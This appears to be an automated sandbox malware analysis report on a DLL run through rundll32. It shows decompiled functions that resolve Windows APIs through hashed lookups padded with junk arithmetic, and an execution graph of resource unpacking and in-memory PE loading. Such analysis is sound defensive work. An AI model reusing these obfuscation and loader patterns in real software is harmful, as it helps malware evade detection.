                                                                                                                          control_flow_graph 285 2346bb-23473b call 2320b9 call 23aa30 SHGetFolderPathW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E002346BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E002320B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0023AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                          0x002346d5
                                                                                                                          0x002346da
                                                                                                                          0x002346e4
                                                                                                                          0x002346ec
                                                                                                                          0x002346f3
                                                                                                                          0x002346f7
                                                                                                                          0x002346fe
                                                                                                                          0x00234705
                                                                                                                          0x0023470c
                                                                                                                          0x00234724
                                                                                                                          0x00234735
                                                                                                                          0x0023473b

                                                                                                                          APIs
                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00234735
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1514166925-0
                                                                                                                          • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction ID: 1f3633c7be4ae9f2ed62f7a2ddf1eb95085440f031275aad379cd8ea9b14d276
                                                                                                                          • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction Fuzzy Hash: 44012C75801218BBCF15AFD5DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002293ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E002293ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0023AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                          0x002293f3
                                                                                                                          0x00229405
                                                                                                                          0x00229411
                                                                                                                          0x00229412
                                                                                                                          0x00229413
                                                                                                                          0x0022941a
                                                                                                                          0x00229421
                                                                                                                          0x00229428
                                                                                                                          0x00229433
                                                                                                                          0x00229436
                                                                                                                          0x0022943d
                                                                                                                          0x00229444
                                                                                                                          0x00229451
                                                                                                                          0x0022945b

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0022945B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction ID: e3b3546883e91a0e858999574d5a931867f36b7ce1248280a80e72db07e580a6
                                                                                                                          • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction Fuzzy Hash: C9F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00231F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00231F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0023AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                          0x00231f8d
                                                                                                                          0x00231f8e
                                                                                                                          0x00231f8f
                                                                                                                          0x00231f93
                                                                                                                          0x00231f94
                                                                                                                          0x00231f99
                                                                                                                          0x00231fa3
                                                                                                                          0x00231faf
                                                                                                                          0x00231fb6
                                                                                                                          0x00231fbd
                                                                                                                          0x00231fc4
                                                                                                                          0x00231fda
                                                                                                                          0x00231fdd
                                                                                                                          0x00231fea
                                                                                                                          0x00231ff5
                                                                                                                          0x00231ffa

                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00231FF5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4033686569-0
                                                                                                                          • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                          • Instruction ID: d3d1774543f384e7296eabdbd498e4ce7294bc83eeb0eba8727b7c85dd42c31d
                                                                                                                          • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                          • Instruction Fuzzy Hash: 45F0F9B191120CFBDF18EFD4D9468AEBFB5EB50304F208199E40467262E7719F589B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00238F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 55%
                                                                                                                          			E00238F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0023AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                          0x00238fa1
                                                                                                                          0x00238fa2
                                                                                                                          0x00238fa3
                                                                                                                          0x00238fa6
                                                                                                                          0x00238fa9
                                                                                                                          0x00238fad
                                                                                                                          0x00238fae
                                                                                                                          0x00238fb3
                                                                                                                          0x00238fbd
                                                                                                                          0x00238fc6
                                                                                                                          0x00238fcd
                                                                                                                          0x00238fd4
                                                                                                                          0x00238fdb
                                                                                                                          0x00238fdf
                                                                                                                          0x00238ff7
                                                                                                                          0x00239002
                                                                                                                          0x00239007

                                                                                                                          APIs
                                                                                                                          • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00239002
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleService
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1725840886-0
                                                                                                                          • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                          • Instruction ID: e514b2255d0258b8f23002517040d092f5f4024eb317050ea0f60a6330cbcd40
                                                                                                                          • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                          • Instruction Fuzzy Hash: 07F0F9B591120CFFDF05AFD4C94A89EBBB4EB14308F208198F80562611E6769B68EF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00235BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E00235BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0023AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                          0x00235c03
                                                                                                                          0x00235c06
                                                                                                                          0x00235c0a
                                                                                                                          0x00235c0b
                                                                                                                          0x00235c10
                                                                                                                          0x00235c17
                                                                                                                          0x00235c23
                                                                                                                          0x00235c2a
                                                                                                                          0x00235c31
                                                                                                                          0x00235c35
                                                                                                                          0x00235c3c
                                                                                                                          0x00235c43
                                                                                                                          0x00235c4a
                                                                                                                          0x00235c62
                                                                                                                          0x00235c6d
                                                                                                                          0x00235c72

                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 00235C6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                          • Instruction ID: 337dcdd8b94671efe68200750d5c3888877b3508ff4baa01b97a8b2e2b4ee655
                                                                                                                          • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                          • Instruction Fuzzy Hash: 98F0ECB5C1020CFBCB04AFE4DA06AEEBBB4EB40318F108188E95566212D3B58B58DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0022B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0022B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0023AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                          0x0022b23f
                                                                                                                          0x0022b240
                                                                                                                          0x0022b241
                                                                                                                          0x0022b244
                                                                                                                          0x0022b247
                                                                                                                          0x0022b24a
                                                                                                                          0x0022b24e
                                                                                                                          0x0022b24f
                                                                                                                          0x0022b254
                                                                                                                          0x0022b25e
                                                                                                                          0x0022b26a
                                                                                                                          0x0022b271
                                                                                                                          0x0022b278
                                                                                                                          0x0022b27f
                                                                                                                          0x0022b286
                                                                                                                          0x0022b28d
                                                                                                                          0x0022b294
                                                                                                                          0x0022b29b
                                                                                                                          0x0022b2b3
                                                                                                                          0x0022b2c1
                                                                                                                          0x0022b2c6

                                                                                                                          APIs
                                                                                                                          • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0022B2C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1586166983-0
                                                                                                                          • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction ID: 79d75e185b8a23f7cba23e9b3ccb4cfc72c2184de82b87b876c31b30fa0662b2
                                                                                                                          • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction Fuzzy Hash: E30116B2C04608FFDF45DFD4DD468AEBBB5EB44304F208188B90566262E3728B64AB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00231E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00231E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0023AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                          0x00231e6d
                                                                                                                          0x00231e70
                                                                                                                          0x00231e73
                                                                                                                          0x00231e77
                                                                                                                          0x00231e78
                                                                                                                          0x00231e7d
                                                                                                                          0x00231e84
                                                                                                                          0x00231e90
                                                                                                                          0x00231e97
                                                                                                                          0x00231ead
                                                                                                                          0x00231eb0
                                                                                                                          0x00231eb7
                                                                                                                          0x00231ebe
                                                                                                                          0x00231ec5
                                                                                                                          0x00231ec9
                                                                                                                          0x00231ed6
                                                                                                                          0x00231ee1
                                                                                                                          0x00231ee6

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00C383C4), ref: 00231EE1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                          • Instruction ID: 351a04246e6b1c804a779d82c84d22d807571838b71a2bbb18183c49ec1b784a
                                                                                                                          • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                          • Instruction Fuzzy Hash: 1E014BB5C1020CFBCF40EFA4D94A99EBFB5EB04304F108498E81567252D7718B28DF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:16.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:297
                                                                                                                          Total number of Limit Nodes:23
                                                                                                                          execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31851 10035085 GetProcAddress 31848->31851 31852 1003509f 31848->31852 31849->31848 31850 1003505f TlsGetValue 31849->31850 31855 1003506a 31850->31855 31853 1003506e 31851->31853 31853->31852 31854 10035095 RtlEncodePointer 31853->31854 31854->31852 31855->31848 31855->31853 31856 10020c26 31857 10020c32 __EH_prolog3 31856->31857 31859 10020c80 31857->31859 31867 1002083b EnterCriticalSection 31857->31867 31881 100201f1 RaiseException __CxxThrowException@8 31857->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31857->31882 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31859->31883 31861 10020c8d 31864 10020c93 31861->31864 31865 10020ca6 ~_Task_impl 31861->31865 31884 100209ed 88 API calls 4 library calls 31864->31884 31868 1002085a 31867->31868 31870 10020893 31868->31870 31871 100208a8 GlobalHandle GlobalUnlock 31868->31871 31880 10020916 _memset 31868->31880 31869 1002092a LeaveCriticalSection 31869->31857 31885 10014460 31870->31885 31872 10014460 ctype 80 API calls 31871->31872 31874 100208c5 GlobalReAlloc 31872->31874 31876 100208cf 31874->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31880 31878->31879 31879->31877 31880->31869 31882->31857 31883->31861 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls ctype 31886->31889 31887->31876 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31897 10030c1c _doexit 31896->31897 31901 10030c69 31897->31901 31907 10030cb9 _doexit 31897->31907 31909 10030a37 31897->31909 31901->31907 31963 100125c0 31901->31963 31902 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31902->31903 31902->31907 31903->31907 31904 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31904->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31902 31907->31895 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31913 10030b67 31910->31913 31914 10030b9c 31910->31914 31912 10030a6e GetVersionExA 31911->31912 31928 10030a67 31911->31928 31915 10030a89 GetProcessHeap HeapFree 31912->31915 31916 10030a7e GetProcessHeap HeapFree 31912->31916 31921 10030b86 31913->31921 31913->31928 32011 100310be 67 API calls _doexit 31913->32011 31917 10030ba1 31914->31917 31918 10030bfa 31914->31918 31919 10030ab5 31915->31919 31916->31928 31995 10035135 6 API calls __decode_pointer 31917->31995 31918->31928 32030 10035425 79 API calls 2 library calls 31918->32030 31985 10036624 HeapCreate 31919->31985 31921->31928 32012 100389ee 68 API calls ___endstdio 31921->32012 31923 10030ba6 31996 10035840 31923->31996 31928->31901 31929 10030aeb 31929->31928 31932 10030af4 31929->31932 31930 10030b90 32013 10035178 70 API calls 2 library calls 31930->32013 32002 1003548e 78 API calls 7 library calls 31932->32002 31935 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31935->32015 31937 10030af9 __RTC_Initialize 31942 10030b0c GetCommandLineA 31937->31942 31956 10030afd 31937->31956 31938 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31938->32014 31939 10030bd0 31943 10030bd7 31939->31943 31944 10030bee 31939->31944 32004 10038d66 77 API calls 3 library calls 31942->32004 32016 100351b5 67 API calls 4 library calls 31943->32016 32017 1002fa69 31944->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31949 10030bde GetCurrentThreadId 31949->31928 31951 10030b26 31952 10030b2a 31951->31952 32007 10038cad 111 API calls 3 library calls 31951->32007 32006 10035178 70 API calls 2 library calls 31952->32006 31955 10030b36 31957 10030b4a 31955->31957 32008 10038a3a 110 API calls 6 library calls 31955->32008 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31956->32003 31962 10030b02 31957->31962 32010 100389ee 68 API calls ___endstdio 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 4 library calls 31960->32009 31962->31928 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 8 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31973 10012744 ___DllMainCRTStartup 31970->31973 31972 1001284d 31972->31902 31972->31904 31974 100127b7 VirtualAlloc 31973->31974 31975 1001279b VirtualAllocExNuma 31973->31975 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 2 library calls 31986->32031 31987->31929 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31929 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31923 31997 10035844 31996->31997 31999 10030bb2 31997->31999 32000 10035864 Sleep 31997->32000 32033 10030678 31997->32033 31999->31928 31999->31935 32001 10035879 32000->32001 32001->31997 32001->31999 32002->31937 32003->31962 32004->31948 32005->31951 32006->31956 32007->31955 32008->31960 32009->31957 32010->31952 32011->31921 32012->31930 32013->31938 32014->31928 32015->31939 32016->31949 32019 1002fa75 _doexit 32017->32019 32018 1002faee _doexit __expand 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree _memmove_s 32026->32053 32029->32018 32029->32020 32030->31928 32031->31989 32032->31993 32034 10030684 _doexit 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 _doexit 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 ___endstdio 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls __NMSG_WRITE 32075->32092 32093 100366f2 67 API calls 6 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree 